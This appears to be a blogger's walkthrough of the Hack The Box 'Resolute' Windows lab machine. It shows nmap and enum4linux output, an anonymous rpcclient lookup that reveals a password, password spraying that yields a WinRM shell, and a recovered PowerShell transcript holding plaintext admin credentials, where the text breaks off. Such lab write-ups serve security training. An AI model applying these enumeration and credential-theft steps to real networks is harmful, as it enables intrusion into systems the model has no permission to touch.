by 
Hack The Box Resolute is my 2nd Windows machine I owned in less than 10 days. Last week I owned the Control and published a writeup in my blog yesterday, and again today very happily posting my second windows machine writeup. TBH, I love working on Windows machines than Linux, yes it is weird compared to my fellow infosec pros.
Let us start..
Btw, I think, getting user of this machine is one of the easiest tasks I ever had on HTB. Let’s start.
Like previous windows based machine, I added IP 10.10.10.169 to my etc/hosts as resolute.htb and preoceed to port scan using namp.
NAMP SCAN RESULTS
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 |
⚡ ⚙root@ns09 ~/htb nmap -T4 -A -v 10.10.10.169 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-10 09:06 +03 NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 09:06 Completed NSE at 09:06, 0.00s elapsed Initiating NSE at 09:06 Completed NSE at 09:06, 0.00s elapsed Initiating NSE at 09:06 Completed NSE at 09:06, 0.00s elapsed Initiating Ping Scan at 09:06 Scanning 10.10.10.169 [4 ports] Completed Ping Scan at 09:06, 0.18s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 09:06 Completed Parallel DNS resolution of 1 host. at 09:06, 0.12s elapsed Initiating SYN Stealth Scan at 09:06 Scanning 10.10.10.169 [1000 ports] Discovered open port 139/tcp on 10.10.10.169 Discovered open port 135/tcp on 10.10.10.169 Discovered open port 445/tcp on 10.10.10.169 Discovered open port 53/tcp on 10.10.10.169 Discovered open port 464/tcp on 10.10.10.169 Discovered open port 636/tcp on 10.10.10.169 Discovered open port 3268/tcp on 10.10.10.169 Discovered open port 88/tcp on 10.10.10.169 Discovered open port 389/tcp on 10.10.10.169 Increasing send delay for 10.10.10.169 from 0 to 5 due to 345 out of 862 dropped probes since last increase. Discovered open port 593/tcp on 10.10.10.169 Discovered open port 3269/tcp on 10.10.10.169 Completed SYN Stealth Scan at 09:06, 6.30s elapsed (1000 total ports) Initiating Service scan at 09:06 Scanning 11 services on 10.10.10.169 Completed Service scan at 09:07, 96.50s elapsed (11 services on 1 host) Initiating Traceroute at 09:08 Completed Traceroute at 09:08, 0.15s elapsed Initiating Parallel DNS resolution of 2 hosts. at 09:08 Completed Parallel DNS resolution of 2 hosts. at 09:08, 0.12s elapsed NSE: Script scanning 10.10.10.169. Initiating NSE at 09:08 Completed NSE at 09:08, 11.91s elapsed Initiating NSE at 09:08 Completed NSE at 09:10, 120.65s elapsed Initiating NSE at 09:10 Completed NSE at 09:10, 0.00s elapsed Nmap scan report for 10.10.10.169 Host is up (0.14s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-10 06:13:30Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=12/10%OT=53%CT=1%CU=32666%PV=Y%DS=2%DC=T%G=Y%TM=5DEF36 OS:CC%P=x86_64-pc-linux-gnu)SEQ(CI=I%II=I)OPS(O1=%O2=%O3=%O4=%O5=%O6=)WIN(W OS:1=0%W2=0%W3=0%W4=0%W5=0%W6=0)ECN(R=Y%DF=Y%T=80%W=0%O=%CC=N%Q=)T1(R=Y%DF= OS:Y%T=80%S=Z%A=S+%F=AR%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q OS:=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A% OS:A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y% OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR% OS:O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD OS:=G)IE(R=Y%DFI=N%T=80%CD=Z) Network Distance: 2 hops Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h47m05s, deviation: 4h37m09s, median: 7m04s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Resolute | NetBIOS computer name: RESOLUTE\x00 | Domain name: megabank.local | Forest name: megabank.local | FQDN: Resolute.megabank.local |_ System time: 2019-12-09T22:15:16-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2019-12-10T06:15:15 |_ start_date: 2019-12-10T00:53:53 TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 144.18 ms 10.10.14.1 2 146.31 ms 10.10.10.169 NSE: Script Post-scanning. Initiating NSE at 09:10 Completed NSE at 09:10, 0.00s elapsed Initiating NSE at 09:10 Completed NSE at 09:10, 0.00s elapsed Initiating NSE at 09:10 Completed NSE at 09:10, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 250.21 seconds Raw packets sent: 1620 (74.786KB) | Rcvd: 1169 (50.010KB) |
Since the machine is Windows and I had similar experience earlier with Forest machine (writeup here) a few days ago, I decided to use Enum4Linux to gather more information about the domain, DNS, users and other information.
ENUM4LINUX SCAN RESULTS
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 |
⚡ root@ns09~/htb/resolute enum4linux -a resolute.htb Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Dec 10 09:26:44 2019 ========================== | Target Information | ========================== Target ........... resolute.htb RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on resolute.htb | ==================================================== [E] Can't find workgroup/domain ============================================ | Nbtstat Information for resolute.htb | ============================================ Looking up status of 10.10.10.169 No reply from 10.10.10.169 ===================================== | Session Check on resolute.htb | ===================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [+] Server resolute.htb allows sessions using username '', password '' Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name: =========================================== | Getting domain SID for resolute.htb | =========================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: MEGABANK Domain Sid: S-1-5-21-1392959593-3013219662-3596683436 [+] Host is part of a domain (not a workgroup) ====================================== | OS information on resolute.htb | ====================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458. Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for resolute.htb from smbclient: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467. [+] Got OS info for resolute.htb from srvinfo: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED ============================= | Users on resolute.htb | ============================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null) index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null) index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null) index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null) index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null) index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null) index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system. index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null) index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null) index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null) index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null) index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123! index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null) index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null) index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null) index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null) index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null) index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null) index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null) index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null) index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null) index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null) index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null) index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null) Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881. user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[ryan] rid:[0x451] user:[marko] rid:[0x457] user:[sunita] rid:[0x19c9] user:[abigail] rid:[0x19ca] user:[marcus] rid:[0x19cb] user:[sally] rid:[0x19cc] user:[fred] rid:[0x19cd] user:[angela] rid:[0x19ce] user:[felicia] rid:[0x19cf] user:[gustavo] rid:[0x19d0] user:[ulf] rid:[0x19d1] user:[stevie] rid:[0x19d2] user:[claire] rid:[0x19d3] user:[paulo] rid:[0x19d4] user:[steve] rid:[0x19d5] user:[annette] rid:[0x19d6] user:[annika] rid:[0x19d7] user:[per] rid:[0x19d8] user:[claude] rid:[0x19d9] user:[melanie] rid:[0x2775] user:[zach] rid:[0x2776] user:[simon] rid:[0x2777] user:[naoki] rid:[0x2778] ========================================= | Share Enumeration on resolute.htb | ========================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640. Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available [+] Attempting to map shares on resolute.htb =================================================== | Password Policy Information for resolute.htb | ==================================================== [+] Attaching to resolute.htb using a NULL share [+] Trying protocol 445/SMB... [+] Found domain(s): [+] MEGABANK [+] Builtin [+] Password Info for Domain: MEGABANK [+] Minimum password length: 7 [+] Password history length: 24 [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: 1 day 4 minutes [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501. [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 7 ============================== | Groups on resolute.htb | ============================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542. [+] Getting builtin groups: group:[Account Operators] rid:[0x224] group:[Pre-Windows 2000 Compatible Access] rid:[0x22a] group:[Incoming Forest Trust Builders] rid:[0x22d] group:[Windows Authorization Access Group] rid:[0x230] group:[Terminal Server License Servers] rid:[0x231] group:[Administrators] rid:[0x220] group:[Users] rid:[0x221] group:[Guests] rid:[0x222] group:[Print Operators] rid:[0x226] group:[Backup Operators] rid:[0x227] group:[Replicator] rid:[0x228] group:[Remote Desktop Users] rid:[0x22b] group:[Network Configuration Operators] rid:[0x22c] group:[Performance Monitor Users] rid:[0x22e] group:[Performance Log Users] rid:[0x22f] group:[Distributed COM Users] rid:[0x232] group:[IIS_IUSRS] rid:[0x238] group:[Cryptographic Operators] rid:[0x239] group:[Event Log Readers] rid:[0x23d] group:[Certificate Service DCOM Access] rid:[0x23e] group:[RDS Remote Access Servers] rid:[0x23f] group:[RDS Endpoint Servers] rid:[0x240] group:[RDS Management Servers] rid:[0x241] group:[Hyper-V Administrators] rid:[0x242] group:[Access Control Assistance Operators] rid:[0x243] group:[Remote Management Users] rid:[0x244] group:[System Managed Accounts Group] rid:[0x245] group:[Storage Replica Administrators] rid:[0x246] group:[Server Operators] rid:[0x225] [+] Getting builtin group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Users' (RID: 545) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Administrators' (RID: 544) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'System Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542. [+] Getting local groups: group:[Cert Publishers] rid:[0x205] group:[RAS and IAS Servers] rid:[0x229] group:[Allowed RODC Password Replication Group] rid:[0x23b] group:[Denied RODC Password Replication Group] rid:[0x23c] group:[DnsAdmins] rid:[0x44d] [+] Getting local group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'DnsAdmins' (RID: 1101) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593. [+] Getting domain groups: group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] group:[Contractors] rid:[0x44f] [+] Getting domain group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Contractors' (RID: 1103) has member: MEGABANK\ryan Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan Group 'Domain Users' (RID: 513) has member: MEGABANK\marko Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus Group 'Domain Users' (RID: 513) has member: MEGABANK\sally Group 'Domain Users' (RID: 513) has member: MEGABANK\fred Group 'Domain Users' (RID: 513) has member: MEGABANK\angela Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie Group 'Domain Users' (RID: 513) has member: MEGABANK\claire Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo Group 'Domain Users' (RID: 513) has member: MEGABANK\steve Group 'Domain Users' (RID: 513) has member: MEGABANK\annette Group 'Domain Users' (RID: 513) has member: MEGABANK\annika Group 'Domain Users' (RID: 513) has member: MEGABANK\per Group 'Domain Users' (RID: 513) has member: MEGABANK\claude Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie Group 'Domain Users' (RID: 513) has member: MEGABANK\zach Group 'Domain Users' (RID: 513) has member: MEGABANK\simon Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. ======================================================================= | Users on resolute.htb via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742. ============================================= | Getting printer info for resolute.htb | ============================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991. Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED enum4linux complete on Tue Dec 10 09:30:37 2019 ⚡ root@ns09~/htb/resolute |
I have handfull of information about the Resolute box now. I have the workgroup name, I have the security and password complexity and other info, I have the security groups info, I have the list of users and their roles info and clear text password of a user.
GETTING USER
Let us exploit SAMBA Service using
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
⚡ ⚙ root@ns09~/htb/resolute rpcclient -U "" -N 10.10.10.169 rpcclient $> queryuser marko User Name : marko Full Name : Marko Novak Home Drive : Dir Drive : Profile Path: Logon Script: Description : Account created. Password set to Welcome123! Workstations: Comment : Remote Dial : Logon Time : Thu, 01 Jan 1970 04:00:00 +04 Logoff Time : Thu, 01 Jan 1970 04:00:00 +04 Kickoff Time : Thu, 14 Sep 30828 05:48:05 +03 Password last set Time : Fri, 27 Sep 2019 16:17:15 +03 Password can change Time : Sat, 28 Sep 2019 16:17:15 +03 Password must change Time: Thu, 14 Sep 30828 05:48:05 +03 unknown_2[0..31]... user_rid : 0x457 group_rid: 0x201 acb_info : 0x00000210 fields_present: 0x00ffffff logon_divs: 168 bad_password_count: 0x00000001 logon_count: 0x00000000 padding1[0..7]... logon_hrs[0..21]... rpcclient $> |
I tried to run EvilWinRM suing the user Marko’s credentials, but it didn’t work. So, I guessed that Marko doesn’t have access to the system or his account is locked out. I decided to use the same password for the rest of the users, the password Welcome123! was worked for Melanie.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
⚡ ⚙ root@ns09~/htb/resolute ruby evil-winrm.rb -i resolute.htb -u melanie -p Welcome123! Evil-WinRM shell v1.8 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\melanie\Documents> cd .. *Evil-WinRM* PS C:\Users\melanie> cd Desktop *Evil-WinRM* PS C:\Users\melanie\Desktop> dir Directory: C:\Users\melanie\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/3/2019 7:33 AM 32 user.txt *Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt 0c3be4[------------]978540 *Evil-WinRM* PS C:\Users\melanie\Desktop> |
PRIVILEGE ESCALATION
The HTB Forum is always helpful, I get a lot of good nudges over there. One of the users left a hint to -force the root of the user, so I did ;). Btw, the -force switch shows the hidden directories.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
*Evil-WinRM* PS C:\> dir -force Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN d--hsl 9/25/2019 10:17 AM Documents and Settings d----- 12/10/2019 5:16 AM Microsoft d----- 9/25/2019 6:19 AM PerfLogs d-r--- 9/25/2019 12:39 PM Program Files d----- 11/20/2016 6:36 PM Program Files (x86) d--h-- 9/25/2019 10:48 AM ProgramData d--h-- 12/3/2019 6:32 AM PSTranscripts d--hs- 9/25/2019 10:17 AM Recovery d--hs- 9/25/2019 6:25 AM System Volume Information d-r--- 12/4/2019 2:46 AM Users d----- 12/4/2019 5:15 AM Windows -arhs- 11/20/2016 5:59 PM 389408 bootmgr -a-hs- 7/16/2016 6:10 AM 1 BOOTNXT -a-hs- 12/9/2019 4:53 PM 402653184 pagefile.sys *Evil-WinRM* PS C:\> |
I noticed the directory “PSTranscripts” and went on finding what is inside. The directory has a folder “20191203” inside, and there is a text file called “PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt”. The text file is a PowerShell transcript. I used Type to read the text file, here is the full transcript.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 |
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt ********************** Windows PowerShell transcript start Start time: 20191203063201 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** Command start time: 20191203063455 ********************** PS>TerminatingError(): "System error." >> CommandInvocation(Invoke-Expression): "Invoke-Expression" >> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ') if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }" >> CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="Stream"; value="True" ********************** Command start time: 20191203063455 ********************** PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> " PS megabank\ryan@RESOLUTE Documents> ********************** Command start time: 20191203063515 ********************** PS>CommandInvocation(Invoke-Expression): "Invoke-Expression" >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }" >> CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="Stream"; value="True" ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: 